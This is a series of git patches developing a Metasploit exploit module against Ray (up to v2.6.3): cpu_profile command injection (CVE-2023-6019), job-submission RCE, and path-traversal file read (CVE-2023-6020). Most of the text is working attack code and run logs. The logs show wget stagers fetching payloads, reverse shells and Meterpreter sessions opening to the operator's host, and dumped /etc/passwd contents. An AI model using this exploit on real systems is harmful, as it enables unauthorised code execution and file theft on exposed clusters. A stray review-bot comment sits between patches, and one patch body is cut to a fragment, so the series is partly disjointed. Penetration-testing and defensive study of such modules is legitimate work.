+[+] /etc/passwd +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin +sys:x:3:3:sys:/dev:/usr/sbin/nologin +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/usr/sbin/nologin +man:x:6:12:man:/var/cache/man:/usr/sbin/nologin +lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin +mail:x:8:8:mail:/var/mail:/usr/sbin/nologin +news:x:9:9:news:/var/spool/news:/usr/sbin/nologin +uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin +proxy:x:13:13:proxy:/bin:/usr/sbin/nologin +www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin +backup:x:34:34:backup:/var/backups:/usr/sbin/nologin +list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin +irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin +nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin +_apt:x:100:65534::/nonexistent:/usr/sbin/nologin +ray:x:1000:100::/home/ray:/bin/bash +``` From ab38c83d9cfbc7d285aee20d7a1abd2903546e72 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Mon, 5 Aug 2024 08:51:56 +0900 Subject: [PATCH 08/42] Update module document --- documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md index 2ea8d4c1a1..2bfd8084eb 100644 --- a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md +++ b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md @@ -1,6 +1,7 @@ ## Vulnerable Application Ray (<=v2.6.3) is vulnerable to three vulnerabilities: + * RCE via cpu_profile command injection vulnerability (CVE-2023-6019) * RCE via the agent job submission endpoint (No CVE) * local file inclusion (CVE-2023-6020) 
@@ -8,9 +9,11 @@ Ray (<=v2.6.3) is vulnerable to three vulnerabilities: This module exploits all three vulnerabilities. The vulnerability affects: + * Ray (<=v2.6.3) This module was successfully tested on: + * Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 ### Install and run the vulnerable Ray (v2.6.3) From b487dadf8c8f0ab049ddb5d39c5b9be57b4e9432 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Mon, 5 Aug 2024 13:01:11 +0900 Subject: [PATCH 09/42] Remove explicit return --- .../modules/exploit/linux/http/ray_cmdi_rce_lfi.md | 1 + modules/exploits/linux/http/ray_cmdi_rce_lfi.rb | 13 ++++--------- 2 files changed, 5 insertions(+), 9 deletions(-) diff --git a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md index 2bfd8084eb..845e8aa109 100644 --- a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md +++ b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md @@ -54,6 +54,7 @@ This is the command to execute. Default is `echo 'Hello from Metasploit'`. This This is the file to read. Default is `/etc/passwd`. This is used when CVE is set to `CVE-2023-6020`. ## Scenarios + ### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CVE-2023-6019, target 0) ``` msf6 > use exploit/linux/http/ray_cmdi_rce_lfi diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb index 8f477ee2cb..8d8c1995eb 100644 --- a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb +++ b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb @@ -79,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote }) return unless res && res.code == 200 - return JSON.parse(res.body) + JSON.parse(res.body) end def get_job_data(cmd) @@ -97,7 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote end return unless res && res.code == 200 - return JSON.parse(res.body) + JSON.parse(res.body) end def lfi 
@@ -115,19 +115,14 @@ class MetasploitModule < Msf::Exploit::Remote when 'CVE-2023-6019' @nodes = get_nodes return Exploit::CheckCode::Safe if @nodes.nil? - - return Exploit::CheckCode::Appears when 'RCE' @job_data = get_job_data(datastore['COMMAND']) return Exploit::CheckCode::Safe if @job_data.nil? - - return Exploit::CheckCode::Appears when 'CVE-2023-6020' @file_content = lfi return Exploit::CheckCode::Safe if @file_content.nil? - - return Exploit::CheckCode::Appears end + Exploit::CheckCode::Appears end def exploit @@ -161,7 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote def execute_command(cmd, opts = {}) case datastore['CVE'] when 'CVE-2023-6019' - return send_request_cgi({ + send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'worker/cpu_profile'), 'vars_get' => { From c71894f3c4a90b281509eb4b449ea0a43b782400 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Wed, 7 Aug 2024 08:21:15 +0900 Subject: [PATCH 10/42] Remove unnecessary DefaultOptions --- modules/exploits/linux/http/ray_cmdi_rce_lfi.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb index 8d8c1995eb..7029b1f3bd 100644 --- a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb +++ b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb @@ -51,7 +51,6 @@ class MetasploitModule < Msf::Exploit::Remote [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ] ], - 'DefaultOptions' => { 'MeterpreterTryToFork' => true }, 'DefaultTarget' => 0, 'DisclosureDate' => '2023-11-15', 'Notes' => { From b7e4247d22bac04649c592a94605a6f17727d606 Mon Sep 17 00:00:00 2001 
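Review bot: After this restructuring `check` returns `Exploit::CheckCode::Appears` for any `datastore['CVE']` value that matches no `when`, because the `case` has no `else` and control falls through to the final expression without a single request being sent; `OptEnum` makes that unreachable today, but an `else` returning `Exploit::CheckCode::Unknown` (or `fail_with(Failure::BadConfig, ...)`) records the intent and protects against the enum being extended without `check` being updated. The same silent fall-through exists in `execute_command`, whose `case` returns nil for an unmatched value; its body continues outside this hunk.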
From: Takah1ro Date: Wed, 7 Aug 2024 08:43:57 +0900 Subject: [PATCH 11/42] Avoid using CVE as option --- .../exploit/linux/http/ray_cmdi_rce_lfi.md | 12 +++++----- .../exploits/linux/http/ray_cmdi_rce_lfi.rb | 22 +++++++++---------- 2 files changed, 17 insertions(+), 17 deletions(-) diff --git a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md index 845e8aa109..8ab6d7b67c 100644 --- a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md +++ b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md @@ -41,17 +41,17 @@ This module was successfully tested on: ## Options -### CVE (required) +### ATTACK (required) -This is the vulnerability to use. Default is `CVE-2023-6019`, but `RCE` and `CVE-2023-6020` can also be chosen. +This is the attack type to use. Default is CMDi(`CVE-2023-6019`). but RCE(No CVE) and LFI(`CVE-2023-6020`) can also be chosen. -### COMMAND (required) +### COMMAND (Optional) -This is the command to execute. Default is `echo 'Hello from Metasploit'`. This is used when CVE is set to `CVE-2023-6019` or `RCE`. +This is the command to execute. Default is `echo 'Hello from Metasploit'`. This is used when ATTACK is set to `CMDi` or `RCE`. -### FILEPATH (required) +### FILEPATH (Optional) -This is the file to read. Default is `/etc/passwd`. This is used when CVE is set to `CVE-2023-6020`. +This is the file to read. Default is `/etc/passwd`. This is used when ATTACK is set to `LFI`. ## Scenarios diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb index 7029b1f3bd..68416258db 100644 --- a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb +++ b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb 
@@ -64,9 +64,9 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ Opt::RPORT(8265), - OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2023-6019', ['CVE-2023-6019', 'RCE', 'CVE-2023-6020']]), - OptString.new('COMMAND', [ true, 'The command to execute', 'echo \'Hello from Metasploit\'' ]), - OptString.new('FILEPATH', [ true, 'File to read', '/etc/passwd']) + OptEnum.new('ATTACK', [true, 'The attack type to use. Default is CMDi (CVE-2023-6019). but RCE (No CVE) and LFI (CVE-2023-6020) can also be chosen.', 'CMDi', ['CMDi', 'RCE', 'LFI']]), + OptString.new('COMMAND', [ false, 'The command to execute', 'echo \'Hello from Metasploit\'' ]), + OptString.new('FILEPATH', [ false, 'File to read', '/etc/passwd']) ] ) end @@ -110,14 +110,14 @@ class MetasploitModule < Msf::Exploit::Remote end def check - case datastore['CVE'] - when 'CVE-2023-6019' + case datastore['ATTACK'] + when 'CMDi' @nodes = get_nodes return Exploit::CheckCode::Safe if @nodes.nil? when 'RCE' @job_data = get_job_data(datastore['COMMAND']) return Exploit::CheckCode::Safe if @job_data.nil? - when 'CVE-2023-6020' + when 'LFI' @file_content = lfi return Exploit::CheckCode::Safe if @file_content.nil? end @@ -125,8 +125,8 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - case datastore['CVE'] - when 'CVE-2023-6019' + case datastore['ATTACK'] + when 'CMDi' # We need to pass valid node info to /worker/cpu_profile for the server to process the request # First we list all nodes and grab the pid and ip of the first one (could be any) @nodes ||= get_nodes 
@@ -146,15 +146,15 @@ class MetasploitModule < Msf::Exploit::Remote @job_data ||= get_job_data(datastore['COMMAND']) print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'") execute_cmdstager({ flavor: :wget }) - when 'CVE-2023-6020' + when 'LFI' @file_content ||= lfi print_good("#{datastore['FILEPATH']}\n#{@file_content}") end end def execute_command(cmd, opts = {}) - case datastore['CVE'] - when 'CVE-2023-6019' + case datastore['ATTACK'] + when 'CMDi' send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'worker/cpu_profile'), From 92e2694ac5733ac79542d023ad17093a0728e47e Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Wed, 7 Aug 2024 08:46:44 +0900 Subject: [PATCH 12/42] Use Detected instead of Appears --- modules/exploits/linux/http/ray_cmdi_rce_lfi.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb index 68416258db..719a4ccacd 100644 --- a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb +++ b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb @@ -121,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote @file_content = lfi return Exploit::CheckCode::Safe if @file_content.nil? end - Exploit::CheckCode::Appears + Exploit::CheckCode::Detected end def exploit From 4e99e7dfe7b682a0154d4fc8ec49e6a0f4e2a2c8 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Wed, 7 Aug 2024 08:50:42 +0900 Subject: [PATCH 13/42] Use Vulnerable when lfi --- modules/exploits/linux/http/ray_cmdi_rce_lfi.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb index 719a4ccacd..ecb56a1202 100644 --- a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb +++ b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb 
@@ -120,6 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote when 'LFI' @file_content = lfi return Exploit::CheckCode::Safe if @file_content.nil? + return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Detected end From a57678c8d39434c911c6e8d0111dd9444958a770 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Wed, 7 Aug 2024 08:51:22 +0900 Subject: [PATCH 14/42] Formatting --- modules/exploits/linux/http/ray_cmdi_rce_lfi.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb index ecb56a1202..64357fa9ba 100644 --- a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb +++ b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb @@ -120,6 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote when 'LFI' @file_content = lfi return Exploit::CheckCode::Safe if @file_content.nil? + return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Detected From f168246796d097c4410ca69441cc7cc088996b28 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Wed, 7 Aug 2024 12:49:17 +0900 Subject: [PATCH 15/42] Correct vulnerable version <=v2.6.3 == [ 'sierrabearchell', # Vulnerability discovery From 1f68919a425de00ec46f56ff3fcb5aa11dfb1ac7 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Wed, 7 Aug 2024 13:01:23 +0900 Subject: [PATCH 16/42] Fail if optional but required option not set --- modules/exploits/linux/http/ray_cmdi_rce_lfi.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb index 52c335806e..51cf4fb440 100644 --- a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb +++ b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb @@ -82,6 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote end def get_job_data(cmd) + fail_with(Failure::Unknown, 'COMMAND required when ATTACK is RCE') unless cmd res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'api/jobs/'), 
@@ -100,6 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote end def lfi + fail_with(Failure::Unknown, 'FILEPATH required when ATTACK is LFI') unless datastore['FILEPATH'] res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "static/js/../../../../../../../../../../../../../..#{datastore['FILEPATH']}") From a92b51904a09862997f8cae27038fcc6cee96da6 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Wed, 7 Aug 2024 21:16:32 +0900 Subject: [PATCH 17/42] Update document --- .../exploit/linux/http/ray_cmdi_rce_lfi.md | 80 +++++++++---------- 1 file changed, 39 insertions(+), 41 deletions(-) diff --git a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md index 8ab6d7b67c..b6e473a7eb 100644 --- a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md +++ b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md @@ -35,7 +35,7 @@ This module was successfully tested on: 4. Do: `set rhost ` 5. Optional: `set rport ` 6. Do: `set lhost ` -7. Optional: `set CVE ` +7. Optional: `set ATTACK ` 8. Do: `run` 9. You should get a shell or meterpreter 
@@ -43,19 +43,20 @@ This module was successfully tested on: ### ATTACK (required) -This is the attack type to use. Default is CMDi(`CVE-2023-6019`). but RCE(No CVE) and LFI(`CVE-2023-6020`) can also be chosen. +This is the attack type to use. Default is CMDi (`CVE-2023-6019`). but RCE (No CVE) and LFI (`CVE-2023-6020`) can also be chosen. ### COMMAND (Optional) This is the command to execute. Default is `echo 'Hello from Metasploit'`. This is used when ATTACK is set to `CMDi` or `RCE`. +This is required when ATTACK is RCE. ### FILEPATH (Optional) -This is the file to read. Default is `/etc/passwd`. This is used when ATTACK is set to `LFI`. +This is the file to read. Default is `/etc/passwd`. This is used and required when ATTACK is set to `LFI`. ## Scenarios -### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CVE-2023-6019, target 0) +### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CMDi, target 0) ``` msf6 > use exploit/linux/http/ray_cmdi_rce_lfi [*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp 
@@ -63,23 +64,19 @@ msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 rhost => 192.168.56.6 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 lhost => 192.168.56.1 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve CVE-2023-6019 -cve => CVE-2023-6019 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 0 -target => 0 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) -[+] The target appears to be vulnerable. +[!] The service is running, but could not be validated. [+] Grabbed node info, pid: 124, ip: 172.17.0.2 [+] Command execution seems to have been successful. Status code: 500 -[*] Using URL: http://192.168.56.1:8080/VvzBBm8 -[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /VvzBBm8 +[*] Using URL: http://192.168.56.1:8080/gSfnYt3 +[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /gSfnYt3 [*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) [*] Sending stage (3045380 bytes) to 192.168.56.6 +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:40066) at 2024-08-07 21:00:50 +0900 [*] Command Stager progress - 100.00% done (112/112 bytes) -[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:40554) at 2024-08-05 08:26:42 +0900 [*] Server stopped. meterpreter > sysinfo 
@@ -91,14 +88,14 @@ Meterpreter : x64/linux meterpreter > ``` -### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CVE-2023-6019, target 1) +### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CMDi, target 1) ``` +msf6 > use exploit/linux/http/ray_cmdi_rce_lfi +[*] Using configured payload linux/x86/shell/reverse_tcp msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 rhost => 192.168.56.6 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 lhost => 192.168.56.1 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve CVE-2023-6019 -cve => CVE-2023-6019 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 1 target => 1 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x86/shell/reverse_tcp @@ -107,15 +104,15 @@ msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) -[+] The target appears to be vulnerable. +[!] The service is running, but could not be validated. [+] Grabbed node info, pid: 124, ip: 172.17.0.2 [+] Command execution seems to have been successful. Status code: 500 -[*] Using URL: http://192.168.56.1:8080/tMBeDO -[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /tMBeDO +[*] Using URL: http://192.168.56.1:8080/l7pOn5OcI8ed4P +[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /l7pOn5OcI8ed4P [*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) [*] Sending stage (36 bytes) to 192.168.56.6 -[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:39652) at 2024-08-05 08:28:46 +0900 -[*] Command Stager progress - 100.00% done (111/111 bytes) +[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:34826) at 2024-08-07 21:02:30 +0900 +[*] Command Stager progress - 100.00% done (119/119 bytes) [*] Server stopped. whoami 
@@ -130,8 +127,8 @@ msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 rhost => 192.168.56.6 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 lhost => 192.168.56.1 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve RCE -cve => RCE +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set attack RCE +attack => RCE msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 0 target => 0 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x64/shell/reverse_tcp @@ -140,14 +137,14 @@ msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) -[+] The target appears to be vulnerable. -[+] Command execution successful. Job ID: 'raysubmit_TKeWeJRKQZFkU2zN' Submission ID: 'raysubmit_TKeWeJRKQZFkU2zN' -[*] Using URL: http://192.168.56.1:8080/roy19E -[*] Command Stager progress - 100.00% done (111/111 bytes) -[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /roy19E +[!] The service is running, but could not be validated. +[+] Command execution successful. Job ID: 'raysubmit_hUcEzX4nBCdr5m3m' Submission ID: 'raysubmit_hUcEzX4nBCdr5m3m' +[*] Using URL: http://192.168.56.1:8080/lISIUc6V +[*] Command Stager progress - 100.00% done (113/113 bytes) +[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /lISIUc6V [*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) [*] Sending stage (38 bytes) to 192.168.56.6 -[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:43312) at 2024-08-05 08:40:06 +0900 +[*] Command shell session 6 opened (192.168.56.1:4444 -> 192.168.56.6:49312) at 2024-08-07 21:07:51 +0900 [*] Server stopped. whoami 
@@ -162,8 +159,8 @@ msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 rhost => 192.168.56.6 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 lhost => 192.168.56.1 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve RCE -cve => RCE +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set attack RCE +attack => RCE msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 1 target => 1 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x86/shell/reverse_tcp 
@@ -172,33 +169,34 @@ msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) -[+] The target appears to be vulnerable. -[+] Command execution successful. Job ID: 'raysubmit_g4jZ3U5aQu4gYrFy' Submission ID: 'raysubmit_g4jZ3U5aQu4gYrFy' -[*] Using URL: http://192.168.56.1:8080/ZMCKWGQCHh -[*] Command Stager progress - 100.00% done (115/115 bytes) -[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /ZMCKWGQCHh +[!] The service is running, but could not be validated. +[+] Command execution successful. Job ID: 'raysubmit_arSdaUWQZPCJy4mr' Submission ID: 'raysubmit_arSdaUWQZPCJy4mr' +[*] Using URL: http://192.168.56.1:8080/OPTAuZv1pjimlr +[*] Command Stager progress - 100.00% done (119/119 bytes) +[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /OPTAuZv1pjimlr [*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) [*] Sending stage (36 bytes) to 192.168.56.6 -[*] Command shell session 4 opened (192.168.56.1:4444 -> 192.168.56.6:42666) at 2024-08-05 08:41:22 +0900 +[*] Command shell session 5 opened (192.168.56.1:4444 -> 192.168.56.6:45048) at 2024-08-07 21:06:40 +0900 [*] Server stopped. whoami ray pwd -/home/ray ``` -### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CVE-2023-6020) +### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (LFI) ``` msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 rhost => 192.168.56.6 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve CVE-2023-6020 -cve => CVE-2023-6020 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 +lhost => 192.168.56.1 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set attack LFI +attack => LFI msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) -[+] The target appears to be vulnerable. +[+] The target is vulnerable. 
[+] /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin From 35354c840721f7e578ba70655f07fde4bac23b54 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Wed, 7 Aug 2024 21:20:09 +0900 Subject: [PATCH 18/42] Update document --- documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md | 1 + 1 file changed, 1 insertion(+) diff --git a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md index b6e473a7eb..514b2be86f 100644 --- a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md +++ b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md @@ -182,6 +182,7 @@ msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run whoami ray pwd +/home/ray ``` ### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (LFI) From 064d463c37aa68247afa1f1bb85a0abab61c0cd8 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Thu, 8 Aug 2024 07:45:16 +0900 Subject: [PATCH 19/42] Formatting doc --- documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md index 514b2be86f..846cf9fb44 100644 --- a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md +++ b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md @@ -47,8 +47,8 @@ This is the attack type to use. Default is CMDi (`CVE-2023-6019`). but RCE (No C ### COMMAND (Optional) -This is the command to execute. Default is `echo 'Hello from Metasploit'`. This is used when ATTACK is set to `CMDi` or `RCE`. -This is required when ATTACK is RCE. +This is the command to execute. Default is `echo 'Hello from Metasploit'`. +This is used when ATTACK is set to `CMDi` or `RCE` and required when ATTACK is `RCE`. ### FILEPATH (Optional) From c36c2eea384ff5c6f68e52541f79c36a5d5ac721 Mon Sep 17 00:00:00 2001 
From: Takah1ro Date: Fri, 9 Aug 2024 08:51:14 +0900 Subject: [PATCH 20/42] Separate modules --- .../auxiliary/gather/ray_lfi_cve_2023_6020.rb | 70 ++++++++++++ .../exploits/linux/http/ray_agent_job_rce.rb | 96 ++++++++++++++++ ...cpu_profile_cmd_injection_cve_2023_6019.rb | 103 ++++++++++++++++++ 3 files changed, 269 insertions(+) create mode 100644 modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb create mode 100644 modules/exploits/linux/http/ray_agent_job_rce.rb create mode 100644 modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb diff --git a/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb b/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb new file mode 100644 index 0000000000..3ce723ef65 --- /dev/null +++ b/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb 
@@ -0,0 +1,70 @@
+ ##
+ # This module requires Metasploit: https://metasploit.com/download
+ # Current source: https://github.com/rapid7/metasploit-framework
+ ##
+
+ class MetasploitModule < Msf::Auxiliary
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ prepend Msf::Exploit::Remote::AutoCheck
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Ray static arbitrary file read',
+ 'Description' => %q{
+ Ray before 2.8.1 is vulnerable to a local file inclusion.
+ },
+ 'Author' => [
+ 'byt3bl33d3r ', # Python Metasploit module
+ 'danmcinerney ', # Python Metasploit module
+ 'Takahiro Yokoyama' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' => [
+ ['CVE', '2023-6020'],
+ ['URL', 'https://huntr.com/bounties/83dd8619-6dc3-4c98-8f1b-e620fedcd1f6/'],
+ ['URL', 'https://github.com/protectai/ai-exploits/tree/main/ray']
+ ],
+ 'DisclosureDate' => '2023-11-15',
+ 'Notes' => {
+ 'Stability' => [ CRASH_SAFE, ],
+ 'SideEffects' => [],
+ 'Reliability' => [ IOC_IN_LOGS, ]
+ }
+ )
+ )
+
+ register_options(
+ [
+ Opt::RPORT(8265),
+ OptString.new('FILEPATH', [ true, 'File to read', '/etc/passwd'])
+ ]
+ )
+ end
+
+ def check
+ @file_content = lfi
+ return Exploit::CheckCode::Safe if @file_content.nil?
+
+ Exploit::CheckCode::Vulnerable
+ end
+
+ def lfi
+ fail_with(Failure::Unknown, 'FILEPATH required when ATTACK is LFI') unless datastore['FILEPATH']
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, "static/js/../../../../../../../../../../../../../..#{datastore['FILEPATH']}")
+ })
+ return unless res && res.code == 200
+
+ res.body
+ end
+
+ def run
+ @file_content ||= lfi
+ print_good("#{datastore['FILEPATH']}\n#{@file_content}")
+ end
+
+ end
diff --git a/modules/exploits/linux/http/ray_agent_job_rce.rb b/modules/exploits/linux/http/ray_agent_job_rce.rb
new file mode 100644
